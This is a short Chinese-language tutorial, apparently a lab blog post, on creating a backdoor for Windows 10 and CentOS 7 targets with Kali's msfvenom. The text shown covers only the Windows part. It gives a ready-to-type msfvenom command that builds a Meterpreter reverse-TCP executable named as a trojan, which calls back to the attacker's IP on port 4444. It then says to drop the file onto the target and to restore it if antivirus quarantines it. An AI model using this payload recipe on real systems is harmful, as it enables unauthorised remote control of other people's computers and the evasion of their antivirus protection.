项目场景:
Kali实现msfvenom在Windows和Linux靶机下后门漏洞
情景复现:
实验环境:Kali-Debian 6 64位、Windows10、Centos7
环境 | 版本 |
---|---|
kali | Debian 6 64位 |
Windows | win 10 |
Linux | Centos 7 |
实验过程:
以下命令可照着敲:
一、Windows 10靶机下
1、msfvenom -p windows/meterpreter/reverse_tcp LHOST=19x.xxx.xxx.xxx(Kali的IP地址) LPORT=4444(自定义端口号,可随意写) -f exe(exe为Windows下可执行文件后缀) > mumachengxu.exe(输出可执行文件的名称,自己取名字)
2、打开主文件夹可以看见刚刚生成的可执行文件,打开win10靶机,把刚刚生成的mumachengxu.exe拖进win10里面(如果有电脑管家或者360杀毒导致文件不在的,请点击找回来)